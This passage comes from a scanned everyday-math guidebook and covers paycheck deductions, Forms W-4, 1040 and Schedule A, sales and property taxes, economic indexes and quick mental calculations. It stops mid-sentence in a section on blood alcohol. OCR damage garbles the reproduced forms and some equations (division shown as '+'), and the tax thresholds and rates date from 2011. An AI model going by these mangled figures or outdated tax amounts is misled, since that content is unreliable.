worked were spread between two other projects. 


The Total column at the right sums up hours spent on each project. 
The Total row at the bottom sums up each day’s hours. The sum of 
each day’s hours should agree with the sum of the project hours. 
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Accrual versus cash accounting 


The two major accounting methods are the cash method and the accrual method: 
Cash method 


In cash basis accounting, business activity at any given moment is determined 
by when cash actually flows into or out of a business. Cash basis accounting is 
simple. Basically, the business checkbook tells the whole story. When you pay for 
materials for your business with a check, that’s cash out the door. When you 
receive money for selling your product, that’s cash in the door. Small businesses 
often use cash basis accounting. 


The trouble is, cash basis accounting ignores timing. If you buy materials by credit 
card, you use them now, but don’t pay until later. If you “bill out” clients, you're 
selling to them (or working for them) now, but they don’t pay until later. These 
amounts don't show up immediately on the business ledger, even though they're 
vital to understanding business activity. 


That's where accrual basis accounting comes in. 
Accrual method 


In accrual basis accounting, the financial picture of a business at any given moment 
is based on when income and expenses are actually incurred. Accrual basis 
“realizes” expenses the moment you incur them, not when you pay for them. 
It “realizes” income the moment you sell a product or service, not when the 
customer pays. 


Here’s how it works: When you create an invoice, the accounts receivable (A/R) 
system generates a receivable, even though the customer may not pay for, say, 30 
days. When the payment comes in, the receivable “goes flat.” It's been satisfied 
by the payment. Accrual basis accounting used to be hard, but now some great 
accounting programs make it easy. 


Accrual basis accounting is thought to provide a more accurate reflection of 
business activity than cash basis accounting. Most businesses use accrual basis 
accounting. 


Parsing Vour Paycheck 


You know that your salary isn’t a gift. It’s the money you get for 
expending your time and energy on work. Your paycheck returns 
some of that energy to you. 
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If you work 40 hours a week, for example, and are paid $20 per 
hour, your gross pay is $800. If you work overtime, you can earn 
even more gross pay. Of course, you don’t bring home everything 
you earn. The taxman cometh, and his deductions, as well as other 
deductions your employer implements (like health or life insur- 
ance deductions), reduce your paycheck. 


In the following sections, I explain how to figure your gross pay 
when you get paid regular time, overtime, and double time wages, 
and how to figure what you can expect to take home after deductions. 


Calculating your gross pay 


It’s a fact that most people work hard to earn their salaries. If 
you’re an hourly employee, here are the major classes of time 
expended on the job: 


Regular time (also known as straight time): Regular time is 
usually time paid on the first 40 hours you work in a week, at 
your base rate. 


Overtime: When you work more than 8 hours in a day or 
more than 40 hours in a week, hours beyond the 8 hours or 
40 hours are paid at the overtime rate, which is often “time 
and a half.” What this means is that you earn your base rate 
plus half your base rate for every hour of overtime hour you 
work. Say your base pay is $20 per hour and you work 10 
hours of overtime. Your hourly overtime rate is $30 per hour. 


Double time: When you work more than 12 hours a day, 
hours beyond 12 hours are paid at the double time rate. (In 
Hollywood, this is called “Golden Time.”) With a base pay of 
$20 per hour, you make $40 per hour when you work double 
time. 


Sick time: Sick time is a company benefit. The company pays 
you straight time for the hours you were out sick. 


Vacation time: Like sick time, vacation time is a company ben- 
efit. Many companies pay 80 hours per year in vacation pay. 
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Figuring your net pay: 
All about deductions 


Net pay isn’t the full amount of your paycheck. It’s the amount you 
can spend. Whereas your gross pay (see the preceding section) tells 
you how much you’ve earned based on the hours you’ve worked 
or the salary you negotiated (if you’re an exempt employee), net 
pay is essentially what’s left over after deductions. 


Payroll deductions come in two flavors — mandated and voluntary. 
Your employer must withhold some money for federal income tax, 
Social Security and Medicare taxes, and other mandatory items, 
like state income taxes and state disability insurance, where 
applicable. You decide on voluntary deductions. They may include 
retirement plans and charitable contributions. 


Figure 13-3 shows typical payroll deductions. You probably 
recognize most of them: 


Federal income tax (FIT) is the withholding for federal 
income tax, based on the number of allowances you chose on 
Form W-4. 


Social Security is the retirement component of Social Security, 
designed to pay you a monthly income later in your life. 

1# Medicare is the Medicare component of Social Security, 
designed to provide payments for healthcare later in your life. 


State income tax (SIT) is the withholding for state income tax, 
based on the number of allowances you chose on Form W-4. 


State disability insurance (SDJ) is a premium you pay, in case 
you're injured on the job. 


Other deductions are usually voluntary and might include deductions 
for a retirement plan, such as a 401(k), SIMPLE IRA, or SEP IRA; 
health savings account; or voluntary contributions to a charity. 


Deduction math is simple: Simply subtract your deductions from 
your gross pay. What’s left is your net pay. 


net pay = gross pay — deductions 
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Employee SSN 
George Spelvin (President), 552 Brock Road, Nevada City, CA 95959 bali 
Pay P 
Earnings and Hours Qty Rate Current YTD Amount 
Hourly Regular Rate 32:00 41.00 1,312.00 17,056.00 
Deductions From Gross Current YTD Amount 
SIMPLE IRA Employee —196.80 —2,558.40 
Taxes Current YTD Amount 
FIT Federal Withholding —168.00 —2,312.00 
Social Security Employee -81.34 —1,057.42 
Medicare Employee —19.02 -247.26 
CA - SIT Withholding 49.47 -643.11 
CA — SDI Disability Employee 14.43 -171.87 
—332.26 —4,431.66 
Net Pay 782.94 10,065.94 
Non-taxable Company Items Current YTD Amount 
SIMPLE IRA Company 39.36 511.68 
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Figure 13-3: Typical payroll deductions. 


Using Form W-4 to change 
how much is withheld 


IRS Form W-4 (official name: Employee’s Withholding Allowance 
Certificate) is a simple form that tells your employer how much 
money to withhold for federal income tax (see Figure 13-4). 


W-4 Employee's Withholding Allowance Certificate OMB No. 1545-0074 
Form 

Department of the Treasury > Whether you are entitled to claim a certain number of allowances or exemption from withholding is 2 0) 1 2 
Internal Revenue Service subject to review by the IRS. Your employer may be required to send a copy of this form to the IRS. 


1 Your first name and middle initial Last name 2 Your social security number 


Home scicrans PAEIT ahd street or urs route) 3 LAsingle LA Married 1 Marmied, but withhold at higher Single rate. 


Note. If married, but legally separated, or spouse is a nonresident alien, check the “Single” box. 


A Or town, state, and. <]P code 4 If your last name differs from that shown on your social security card, 


check here. You must call 1-800-772-1213 for a replacement card, > 


5 Total number of allowances you are claiming (from line H above or from the applicable worksheet on page 2) 5 
6 Additional amount, if any, you want withheld from each paycheck . . . 2. 2... 1 wee ee 6 |$ 
7 I claim exemption from withholding for 2012, and I certify that | meet both of the following conditions for exemption. 


* Last year I had a right to a refund of all federal income tax withheld because | had no tax liability, and 

+ This year | expect a refund of all federal income tax withheld because | expect to have no tax liability. 

If you meet both conditions, write “Exempt” here. . . . 0 0. ee 17 
Under penalties of perjury, | declare that | have examined this certificate and, to the best of my knowledge and belief, it is true, correct, and complete. 


Employee's signature 


(This form is not valid unless you sign it.) > Date > 
Employer's name and address (Employer. Complete lines 8 and 10 only if sending to the IRS.) | 9 Office code (optional) | 10 Employer identification number (EIN) 
For Privacy Act and Paperwork Reduction Act Notice, see page 2. Cat. No. 102200 Form W-4 (2012) 


Figure 13-4: IRS Form W-4. 
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You don’t tell your company how much money to withhold. (It has 
tables and computers to do that task.) Instead, you use a Form W-4 
to tell you’re your company how many allowances to select. The 
higher the number of allowances, the less federal income tax your 
employer withholds. Less withheld means you have more money 
to spend. 


The number you enter is usually based on the total number of 
dependents in your household. Generally, you declare yourself, 
your spouse, and your children. There are variations and other 
tweaks as well. If your mother lives with you, for example, you can 
usually claim her, too. If you declare yourself, your spouse, your 
two minor kids, and your mom who lives with you, you have 5 
allowances. 


You complete Form W-4 when you're hired for a job. But you can 
fill out a new one any time. If you have a new baby, for example, 
you’d want to increase your number of allowances. If you think 
you'll take a hit at tax time, you can decrease your number of 
allowances so that more taxes are withheld each paycheck. 


The objective is generally to free as much cash as possible now. 
There’s usually no point in over-withholding. If you'd like to doa 
withholding calculation using the W-4 worksheet, you can 
download a W-4 form from http: //www.irs.gov. 


Chapter 14 


How Taxing! (Almost) 
Understanding the 
Government 


In This Chapter 
Comprehending income tax 
Taking on the terrifying Form 1040 
Managing the many kinds of taxes 


Reviewing government fees 


t takes money to run the government, and money comes to it in 

the form of taxes. A tax is a financial charge that the government 
imposes on a taxpayer, who may be an individual (you) or a 
corporation (your company). 


The great Supreme Court Justice Oliver Wendell Holmes said, 
“Taxes are the price we pay for a civilized society.” That makes 
sense, because government takes care of national defense, police 
services, firefighting, scientific research, and much, much more. 
At their best, taxes you pay return value in services to you. At 
their worst, taxes are a little like what Dr. Waldman says in the 
1931 movie, Frankenstein: “You have created a monster, and it will 
destroy you!” 


In this chapter, you see some top-level information about taxes — 
what they are, how they work, and how to calculate them. 
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Illuminating Income Taxes 


An income tax is a tax on personal or corporate income. Chances 
are, you pay United States federal income tax, and many states (41 
out of 50 at last count) levy income taxes, too. 


Fortunately, income tax is easier to understand and calculate than 
many people think. You need only to know some terms and do 
simple arithmetic. 


Emperor Wang Mang of China imposed an income tax in 10 AD, and 
Henry II used an income tax to raise money for the Third Crusade. 
These days, about 123 countries have a tax on income. 


Taming Form 1040 


The basic income tax form in the United States is the Internal 
Revenue Service Form 1040, U.S. Individual Income Tax Return (see 
Figure 14-1). At the core, the 1040 is simple. You figure out your 
total income, make a few subtractions, and pay a tax on the 
difference. 


E 10 40 Department of the Treasury— Internal Revenue Service (99) 2 01 1 
4 U.S. Individual Income Tax Return OMB No. 1545-0074 | IRS Use Only—Do not write or staple in this space. 


For the year Jan, 1-Dec, 31, 2011, or other tax year beginning , 2011, ending +20 See separate instructions. 


Your first name and initial Last name Your social security number 
Tf a joint return, spouse's first name and initial Last name Spouse's social security number 
Home address (number and street). If you have a P.O. box, see instructions Apt. no, A. Make sure the SSN(S) above 


and on line 6c are correct. 


City, town or post office, state, and ZIP code. If you have a foreign address, also complete spaces below (see instructions). Presidential Election Campaign 
Check here if you, or your spouse if fing 
jointly, want $3 to go to this fund, Checking 
a box below will not change your tax or 
refund, You [] Spouse 


Foreign country name Foreign province/county Foreign postal code 


Filing Status 1 O Singe 4 Head of household (with qualifying person). (See instructions.) If 
2 LD Married filing jointly (even if only one had income) the qualifying person is a child but not your dependent, enter this 
Check only one 3 L Married filing separately. Enter spouse's SSN above child's name here. Pe 
box. and full name here. > 5 Qualifying widow(er) with dependent child 
: Boxes checked 
Exemptions 6a Yourself. If someone can claim you as a dependent, do not check box 6a Ee & i ear me 
b Spouse 2 cate ih. eee ee ee A EA oea ak gaddien TA 
: r 7 (4) 7 if child under age 17 on 6c who: 
c Dependents: eal my cae Ricca ou | Wwalitying for child tax credit * lived with you 
(1) Firstname Last name Pep (see instructions) «ddnetivewith 
Ss you due to divorce 
ae r separation 
If more than four oF {see instructions) 
dependents, see 3 Dependents on 6c 
instructions and a8 not entered above __ 
check here » i A Add numbers on 
Total number of exemptions claimed . . .. . . ....... .. . . lines above P 


Income 7 Wages, salaries, tips, etc. Attach Form(s) W-2 — . «ww a a a a a 
8a Taxable interest. Attach Schedule B if required . . . . . . . . . 
Tax-exempt interest. Do not include on line 8a . . . 


Figure 14-1: The top portion of Form 1040. 
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This section is about filling out a tax form. I’m not an accountant 
or an attorney, so for tax advice, you want to consult a tax 
professional. 


Form 1040 has several sections, each of which contains a group of 

lines that you fill in or ignore, depending on what applies to you. In 
the next sections, I take you through the form, explaining the math 
along the way. 


After putting in your name, address, other identifying information 
and indicating your filing status, you proceed through a series of 
sections. 


The following sections are based on the 2011 1040 Form. So stay 
alert! In addition to the form changing every year, the standard 
deduction amount, exemption amount, and tax rates change every 
year, too. To avoid trouble, make sure you use the current form 
and the correct amounts. 


The Exemptions section 


Exemptions lower your taxable income (and therefore lower your 
tax). In the Exemptions section, you claim yourself, your spouse (if 
applicable), and your dependents if you have them, and add up all 
the people you claimed. For example, if you check boxes for 
yourself and your spouse, and list the names of your three kids, 
you have 5 exemptions. 


The Income section 


In this section, you tally up all the ways you brought in money to 
get your total income. Income has many sources, including your 
wages, interest, dividends, and alimony. This is also where 
self-employment income and farm income go. Even unemployment 
compensation (if you can believe it!) is subject to income tax. But 
don’t worry (yet). By contrast, taxable income is income you will 
pay taxes on, which is going to be lower than total income. Most 
people get their income figure from Form W-2, which their company 
gives them at the end of the year. 


The Adjusted Gross Income section 

Adjusted gross income (AGD is just what it says: income adjusted 
by adjustments. In this section, you record any adjustments you’re 
entitled to. Adjustments reduce your AGI (which will reduce your 
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taxable income). They include educator expenses (for teachers, 
of course), moving expenses, interest on student loans, and IRA 
contributions. You may have no adjustments, but if you do, add 
them up. 


To calculate adjusted gross income, you do a simple subtraction: 


adjusted gross income = income — adjustments 


The Taxes and Credits section 


This is where you enter deductions and exemptions and calculate 
your tax. 


A deduction is an expense you're allowed to use to reduce AGI. 
That’s good, because if you lower your AGI, the result will be a 
lower taxable income. There are many kinds of deductions, and the 
1040 allows you to choose between a standard deduction (in 2011, 
$5,800 for a single person) or a larger amount, if you “itemize” 
deductions on Form 1040 Schedule A. An exemption isn’t a 
deduction, but it has the same function — lowering your AGI. 


Here are some important parts of the Taxes and Credits sections: 


Entering your deductions: Enter the standard deduction or 
the itemized deductions from Schedule A. 


 Tallying up your exemptions: For every exemption you 
entered on page 1 (yourself, spouse, and dependents), you 
multiply by $3,700 (in 2011). 


Finding your taxable income: Taxable income is the income 
you'll pay taxes on. To figure it, you subtract your deductions 
and your exemptions from your AGI: 


taxable income = AGI — itemized deductions — exemption amount 


Indicating your tax and tax credits: Tax is the tax you owe. 
You can get the number by doing a tax rate calculation, but 
most people simply go to the tax tables in the Form 1040 
instructions. You enter the tax on the Tax line (which on 2011 
forms was Line 44). Below that line are about eight other “tax 
credit” lines, where you might enter (for example) a residential 
energy credit. 


You can be sure that this is a simple example. The 1040 has 
many other tax and credit lines. Just add tax credits together 
and subtract them from your tax. 


No negative numbers exist in Government Land! If your tax is 
$1,000 and your credits are $2,000, you enter 0! 
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Marginal rate 


The marginal tax rate is the rate on the last dollar of income you earned. Despite 
the murky name and equally murky definition, it's not a hard number to understand. 
The government taxes the first dollars you make in a year at a low rate. Then when 
you earn a few more, those additional dollars get taxed at a higher rate. By the end 
of the year, you may have earned enough for the last dollars to be taxed at an even 
higher rate. 


The marginal rates are known as tax brackets. You may have heard a friend say, 
“I'm in the 28 percent tax bracket.” In the U.S., the brackets are 10, 15, 25, 28, 33, 
and 35 percent. To see the current tax brackets and the income each applies to, 
visithttp: //www.irs.gov 


To determine your marginal rate, you can use the tax tables. Or use a marginal 
rate calculator. You can find both simple and complex calculators on the Internet. 
You enter wages, filing status, number of dependents, and the amount of itemized 
deductions. The calculator tells you your marginal tax rate. To see one of them, visit 
http: //www.dinkytown.net/java/TaxMargin.html. 


The Other Taxes section 


There’s always room for more taxes. Among other things, this 
section asks you to enter self-employment task (if you’re in 
business for yourself). Just add up the lines and add the total to 
your tax. You put this in a line called “Total Tax.” At last! 


The Payments section 


The amount of your federal withholding (from the Form W-2 your 
company gave you) goes in this section. There are a couple of 
other possible credits (such as a first-time homebuyer credit), too. 


The Refund and Amount Vou Owe sections 


If your withholding is larger than your total tax, you are going to 
get a refund. If it’s smaller, you owe Uncle Sam some money. Just 
subtract. 


Deciding whether to itemize 


Should you itemize deductions? For many taxpayers, it’s an annual 
question. The short answer is, if you own a home with a mortgage, 
probably yes. If you don’t, you'll have to dig deeper to determine 
whether itemizing is the way to go. Here’s why: If you don’t 
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itemize, you’re entitled to a standard deduction. In 2011, that 
deduction was $5,800 for a single person and $11,600 for a married 
couple filing jointly. 


The main reason to itemize is when you can get more than that 
standard deduction because you have more than $5,800 or $11,600 
worth of deductions. The reason so many homeowners opt to item- 
ize is because interest paid on a mortgage ends up being a big 
deduction that either pushes them over the standard deduction 
amount or gets them close enough to it that, with a few other 
deductions, they end up exceeding the standard deduction. 


When you’re making the “itemize or not” decision, your math task 
is to determine whether your deductions exceed the standard 
deduction amount. It’s simple addition and comparison: Add up all 
your individual deductions, compare that amount to the standard 
deduction amount, and go with the one that’s higher. 


What’s not so easy is determining which and how much of the 
potential individual deductions you can take. To itemize, you use 
IRS Form 1040 Schedule A (Figure 14-2 shows the top part of this 
form). 


SCHEDULE A 
(Form 1040) 


OMB No. 1545-0074 


2011 


Department of the Treasury Attachment 
Internal Revenue Service (99) Sequence No. O7 
Name(s) shown on Form 1040 Your social security number 


Itemized Deductions 


> Attach to Form 1040. > See Instructions for Schedule A (Form 1040). 


Medical Caution. Do not include expenses reimbursed or paid by others. 
and Medical and dental expenses (see instructions) . . . . . 1 


1 
Dental 2 Enter amount from Form 1040, line 38 La 
Expenses : Multiply line 2 by 7.5% (.075) . . 0a aa aa 3 

5 


Subtract line 3 from line 1. If line 3 is more than line 1, enter-0-. n 4 
Taxes You State and local (check only one box): 
Paid a Income taxes, or } oy Be Se oe oe ee Bh 5 


b General sales taxes 


Figure 14-2: IRS Form 1040 Schedule A. 


The Schedule A deductions fall into several categories. The 
following list summarizes each category and what it takes to meet 
the deduction floor, or threshold. 


A floor (also called a threshold) is a level below which no deduction 
is allowed. Different deductions have different floors. For example, 
job expenses and miscellaneous deductions are deductible only 

to the extent that they exceed 2 percent of your AGI. Below that, 

you get nada. For example, if you have an AGI of $20,000, 2 percent 
is $400 (simply multiply your AGI by 0.02). You may have $600 in 
job expenses, but you don’t get $600 as a deduction. You get the 
amount over $400, or $200. 
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Medical and Dental Expenses: You can claim medical and 


dental expenses, but here’s the catch: You can deduct only 
the amount by which your total medical care expenses for 
the year exceed 7.5 percent of your AGI. (Don’tcha just love 
it? Some of those medical expenses you thought were 
deductible probably aren’t, due to the threshold.) To determine 
how much expenses exceed the threshold, multiply your AGI 
by 0.075 to determine the floor. You can deduct any medical 
expenses over that amount. 


The math you use here is entirely about calculating the floor 
and subtracting it to get your allowable medical expense 
deduction. 


1” Taxes You Paid: Here’s the place to enter a variety of taxes, 


such as state income taxes, sales taxes, real estate taxes, and 
personal property taxes. Check with your tax advisor. Then 
add them all up. 


Interest You Paid: Homeowners get excited about this section. 


That’s because most homeowners have a big interest 
component in their mortgage payments. The lender will send 
you a Form 1098, which gives you the amount of interest you 
paid. The home mortgage interest deduction is America’s 
favorite tax deduction. It’s usually big, and the lender does 
the math for you. 


If you rent, you pay the rent, but the landlord takes the 
mortgage interest deduction. 


Gifts to Charity: Most charitable donations are small amounts 


of cash or are represented by a receipt for the items you 
donate to a charity thrift store. 


If you’re giving vast amounts of stock or property to charity, 
you definitely need to talk to a tax professional because how 
much charitable giving you can deduct is subject to many 
rules. There are often limitations regarding what you can give. 


Casualty and Theft Losses: Generally, you can deduct losses 


to your home, household goods, and motor vehicles. But, of 
course, limitations exist if you have insurance — and most 
people have automobile, homeowner’s, or renter’s insurance, 
if they can afford it. To figure it all out, you need an instruction 
pamphlet from the IRS, and you need to attach a special 

form (Form 4684) to your tax return. You can see the form at 
http://www.irs.gov/pub/irs-pdf/f4684.pdf. 


Job Expenses and Certain Miscellaneous Deductions: 


Some employee job expenses — travel, union dues, and job 
education — are deductible. You need to attach Form 2106 or 
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Form 2106-EZ. Again, your math is simple. Just list the items 
and add them up. 


By the way, tax preparer fees are deductible, too. So’s a safe 
deposit box and other such items. 


Other Miscellaneous Deductions: “Other” deductions can be 
an adventure. For example, a horse is likely to be disallowed 
as a “hobby expense,” unless you’re in the horse business. 

It doesn’t matter how much Flicka, Black Beauty, or Stripes 
costs you in maintenance and training. Bottom line: Do your 
research and ask your tax professional. Then list the allowable 
items and add them up. 


As they say in Hollywood, “It’s a wrap!” Total the deductions from 
the various sections. The real-life math is just to add everything up 
and move the number over to the correct line on Form 1040. 


Observing Other Taxes 


As Ben Franklin noted, nothing is certain but death and taxes. And 
taxes of all kinds have been around for a long time. Taxes come in 
many forms, and you can easily calculate them if you know how. 


Surveying sales tax 


A sales tax is a percentage-based tax charged on the goods and 
services you buy. Almost all purchases (except some Internet 
sales) require that you pay sales tax. Sales taxes are state taxes, 
sometimes with a local tax added on. 


In the United States, sales tax rates vary from 0 percent (New 
Hampshire, Delaware, Oregon, Montana, and Alaska) to 7.50 percent 
(California). 


Although you can see how much you've paid in sales tax just by 
checking the tax line on your grocery receipt or restaurant check, 
occasionally you want to know how much tax you'll owe before 
you make a purchase. In that case, simply take the cost of the item 
and multiply it by the sales tax percentage. If you’re buying a $139 
dress and sales tax is 7 percent, use this equation: $139 x 0.07 = $9.73. 
See Chapter 5 for the details on sales tax. 
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Processing property tax 


Property tax is a local tax that homeowners pay and that is 
assessed by the county assessor. (Renters pay property tax, too, 
because landlords pass it on to them in the monthly rent.) 


The actual amount you pay for property tax depends on your 

local tax rate (in California where I live it’s 1.25 percent) and the 
assessed value of your home. For a $200,000 home in California, for 
example, you calculate taxes as follows: 


tax = assessed value x 1.25 percent 
tax = $200,000.00 x .0125 
tax = $2,500.00 


Many mortgage companies include property taxes in your monthly 
mortgage payment and keep the amount in escrow until a tax 
payment becomes due. If you own your home outright, however, 
the tax bill comes directly to you. Also keep in mind that property 
taxes are often levied twice a year. To determine what you'll have 
pony up each six months, simply divide your yearly tax burden by 
2. If your annual property tax burden is $2,500, for example, you 
will pay $1,250 every six months. If you have an escrow account, 
about $208 of your monthly payment goes into it ($2,500 = 12). 


Fee, fie, foe, fum 


Whereas a tax is for the general fund and has no direct connection 
with individual benefits, a government fee is money you pay for 
specific, directly beneficial goods or services. For example, a user 
fee, such as the one you pay to get into a national park, benefits 
you directly. If you don’t want to go to the national park, you don’t 
have to pay the fee. 


Don’t be misled by someone who calls everything, including fees, 
“taxes” — for example, insisting that bridge and tunnel tolls are 
taxes. They aren’t. The reverse is sometimes true: Every once in 
a while, a state or local government tries to call a tax a fee. That’s 
understandable, because a lot of people are tax-averse, but it’s 
wrong, and the courts usually call them on it. 
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Following are some common fees: 


Motor vehicle fees: If you own a vehicle, you very likely 
pay registration fees every year to the Department of Motor 
Vehicles. In California (where I live and where we worship 
cars), a typical vehicle renewal notice bills out several fees, 
like registration fees, license fees (which you may get an 
income tax deduction for), fees for personalized license plates 
(called vanity plates), and so on. 


Licenses and permit fees: Sometimes a fee is part of a license 
or permit application. You can pay fees for building permits, 
demolition permits, logging permits, entry to the landfill, 
business licenses, and so forth. Fishing and hunting license 
fees fall into this category, too. 


The math involved in figuring out what fees you owe is pretty 
simple: Find out what the current fee is, add in any subcomponents 
of the fee, and then add them up. For example, a California fishing 
license not only has the basic sport fishing component, but 
additional subcomponents for fishing in the ocean, using a second 
rod, fishing in the Colorado River, taking abalone, taking salmon in 
the northern rivers, taking steelhead, and taking spiny lobsters. 


Making sense of government indexes 


An index is a set of numbers, usually created by statisticians and evaluated by 
economists. 


The U.S. government has many indexes, and they are mainly money-related numbers. 
In government indexes, math and civics merge: These numbers are bandied about 
and used to justify all sorts of policy decisions and to characterize how well or 
poorly the U.S. is doing. By understanding what these terms mean and how the 
numbers are calculated, you can better evaluate the info you're getting. 


Gross National Product (GNP): The GNP is the market value of all the “output” 
(products and services) produced in a year. It considers all the property and 
labor of the country’s residents, but it doesn’t care whether the enterprises 
are in the U.S. or abroad. So, if Apple makes iPads in China or HP makes PCs in 
Indonesia, that’s part of the GNP. GNP was a hot number until 1991. Now GDP 
is used more frequently. 


Gross Domestic Product (GDP): GDP is the market value of all goods and services 
produced within a country in a period. A big growth rate is better than a small one, 
or a negative one. For example, India is doing fine with a GDP growth rate of 7.8 
percent; the United States is recovering from a recession and has a growth rate of 
1.7 percent; and Portugal is in big trouble with a growth rate of —2.2 percent. 
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By the way, the United States has the biggest economy in the world, with a GDP 
of $14.447 trillion. China is #2, with a GDP of $5.739 trillion. 


GDP per capita: This is a measure of a country’s standard of living. It's a 
country’s GDP divided by the country’s population. You can find lists of GDP per 
capita on the Internet. Take a look. You might be surprised that Luxembourg 
gets the top spot, with a GDP per capita of $113,533 USD. Where’s the good old 
U.S. of A? A bit down the list at number 14, with $48,387 USD per person. 


1# Per capita income: Per capita income (or income per person) is the average 
income of a country, a state, or a city. “Per capita” means “per head.” To 
get per capita income, you take all sources of income and divide it by the 
population. Per capita income is a very rough measure of prosperity, and it 
doesn’t show distribution. Therefore, it doesn’t say anything about individual 
people, rich or poor. 


1# Inflation rate: The inflation rate is the annual rate of increase in the consumer 
price index (CPI). If prices go up, say, 3 percent in a year, the inflation rate is 
3 percent. An example of inflation at work is when, over time, a loaf of bread 
increases in price from $2.00 to $4.00. Your bucks can't buy all the bread they 
used to, so you might also say that your purchasing power (the amount of goods 
or services you can buy with a unit of currency) has gone down. Of course, if 
your income goes up as prices go up, your purchasing power isn't diminished. 
You don’t feel the pain (as much). That's “keeping up with inflation.” 


A famous American myth claims that a young George Washington threw a 
silver dollar across the Potomac River and inspired a very old joke from a 1942 
Loony Tunes cartoon: “Why couldn't he do it today? Because a dollar doesn't 
go as far as it used to.” 


Unemployment rate: The unemployment rate measures unemployment and is the 
percentage of the workforce that’s not working, willing and able to work, and 
actively looking for work. In the United States, the unemployment rate doesn't 
reflect those working part time (the underemployed) and those who have given 
up looking for work after months or years of being unable to find a job. 


The unemployment rate is calculated by dividing the number of unemployed 
workers by the total number of workers in the workforce and then multiplying that 
value by 100. For example, if a country with 300 million people has a workforce 
of 150 million people and 12 million people are unemployed, the unemployment 
rate is 8 percent (12 + 150 x 100). 


Consumer price index: The U.S. Consumer Price Index (CPI) shows changes 
in the price level of goods and services you buy. It's the main measure of infla- 
tion. Every month, the Bureau of Labor Statistics determines the CPI by looking 
at consumer goods and services, like housing, clothing, energy, and utilities. 
A low monthly CPI change (an increase of 0.3 percent, for example) is a good 
thing, as it means that prices are not rising fast. 
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Part IV 
The Part of Tens 


The 5th Wave By Rich Tennant 


“Okay —let’s play the statistical probabilities of 

this situation. There are 4 of us and 1 of him. Phillip 

will probably start screaming, Nora will probably 

faint, you'll probably yell at me for leaving the 

truck open, and there’s a good probability Pil run 
like a weenie if he comes toward us.” 


In this part... 


] he world loves lists of ten things, and in these chap- 


ters you find a bunch of fun and useful information in 
a very small space. Here I list quick calculations you can 
do in your head and fun games and activities that build or 
use your math skills and sharpen your critical thinking. 


Chapter 15 


Ten Quick Calculations You 
Can Do in Your Head 


In This Chapter 


Calculations that come in handy on the road 


Estimating taxes and tips on the fly 
Easy ways to determine pizza, paint, and other amounts 


W- a real-life math problem comes up, you may not have 
a calculator handy or the situation doesn’t lend itself to 
using one (like when you're driving or when you're figuring the tip 
at a business lunch). Even if you do have one handy, the easiest 
and most efficient way to solve many math problems is in your 
head. Although not all math problems lend themselves to mental 
math, there are some handy calculations you can keep in your 
head. Here are ten of them. 


Miles to Kilometers 


To convert from kilometers to miles, you first need to know that 

1 km = 0.62 mi (actually, it’s really 0.621371, but don’t worry about 
the other decimal places). Say you leave Amsterdam to visit 
Haarlem, a trip of 20 km. If 1 kilometer equals about 0.62 miles, 
then 10 km = 6.2 mi. Double that, and you’ll see that the 20 km trip 
is 12.4 mi. 


To go from miles to kilometers, divide the distance in miles by 

2 and then add that number back to the original distance. For 
example, say your destination is 28 miles away. Divide 28 by 2 to get 
14, and then add 14 back to the original number of miles (28). The 
answer: 42. (If you’re interested, 1 mi = 1.60934. In this method, 
you're multiplying by 1.5, not the actual conversion factor of 1.6, 
but it’s close enough.) 
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Miles to Vour Destination 


When you’re driving, you can find the distance to your destination 
in three ways: You can look at the distances on the highway 

signs. You can enter your destination into your GPS and check it 
periodically to see how far you have left to go. Or you can doa 
little mental math: Before traveling, look up how far it is to your 
destination (you can use an online map program, like Google 

Maps — https: //maps.google.com) and set your trip odometer 
to 0. As you drive, subtract the miles on the trip odometer (how far 
you ve traveled) from the total distance you know you will travel. 


Time to Destination 


When you’re driving, the easy answer to the question “Are we 
there yet?” is “No.” A harder question to answer is, “When will we 
get there?” To find the time to your destination, you just need to 
know distance and speed, because time = distance + speed. 


For example, suppose that the road sign says your destination is 
180 miles away, and your speedometer says you’re moving along 
at about 60 miles per hour. Divide distance (180 miles) by speed 
(60 miles per hour) to get time (3 hours). Of course, for other 
distances and speeds, the calculations are harder, but the formula 
is the same. 


Sales Tax and VAT 


In many parts of the United States, sales tax on purchases is over 
8 percent. To be safe, estimate it at 10 percent. To find out how 
much tax you'll pay on an item, just divide the item’s price by 10 
(move the decimal over 1 place to the left). For a $15.00 item, for 
example, the result is $1.50. 


Many countries have a value added tax (VAT), and you use the 
same kind of math to figure those. The VAT is usually about 

20 percent of the price of an item. To estimate the VAT, first divide 
the price by 10 (for a €50.00 item, for example, that’s €5.00) and 
then double it. The VAT on the €50.00 item will be €10.00. 
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Tips 
To leave a 15 percent tip, you simply figure out what 10 percent of 
the check is (move the decimal to the left 1 place), what 5 percent 
of the check is (halve the 10 percent value), and then add the 
numbers together. For example, a $23.00 check divided by 10 is 
$2.30. Divide that amount by 2 to get$ 1.15. Now add the two 
numbers together: $2.30 + $1.15 = $3.45. 


To leave a 20 percent tip, move the decimal place over 1 spot 

to determine what 10 percent of the bill is and then double that 
amount. For example, 10 percent of a $55.00 check is $5.50. Double 
that to get $11.00. Easy peasy. 


How Much Paint to Buy 


To figure out how much paint to buy, first divide the area a gallon 
will cover (you can get this information off the paint can) by the 
height of a room. This gives you the number of linear feet the 
gallon will cover. If the paint covers 400 square feet and your walls 
are 8 feet high, you know that a gallon is enough to paint 50 linear 
feet. Next, measure the perimeter of the room. For a 9 foot by 12 
foot room, for example, the perimeter is 9 + 9 + 12 + 12 feet, or 42 
feet. If a gallon covers 50 linear feet, you know that one gallon will 
do the job with some paint left over. You can extend this to multiple 
rooms. Just add all the perimeters together and count on using 

1 gallon of paint for every 50 linear feet. 


Number of Pizzas to Buy 


Pizza is a favorite food when you're feeding a bunch of people, 
whether it’s your kid’s Little League team or a project team that’s 
working late on a deadline. The math comes in when you have to 
determine how many pizzas to buy. Simply figure out how many 
pieces total your group is likely to eat and then divide that number 
by the number of slices in a pizza. 


Here’s an example: Say you’re taking 12 kids from your youth 
soccer team out for pizza. You figure that each kid will eat 2 pieces, 
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so you know you need 24 pieces of pizza (12 x 2 = 24), anda 
typical 14-inch pizza has 8 slices. By dividing the total number of 
slices needed by the number of slices in a pizza, you know you 
need 3 pizzas (24 + 8 = 3). You can use the same kind of calculation 
to figure out how much cake to buy for a wedding shower, how 
many boxes of juice to buy for your kid’s class party, and other 
similar scenarios. 


Blood Alcohol Content (BAC) 


NING 


RY 


In most states, driving with a blood alcohol content (BAC) — the 
percentage of alcohol in your blood — of 0.08 percent or higher 
will get you in serious trouble. So how much can you consume 
before you cross the legal drinking threshold? 


A 12 ounce can of beer, a5 ounce glass of wine, and a 1 ounce shot 
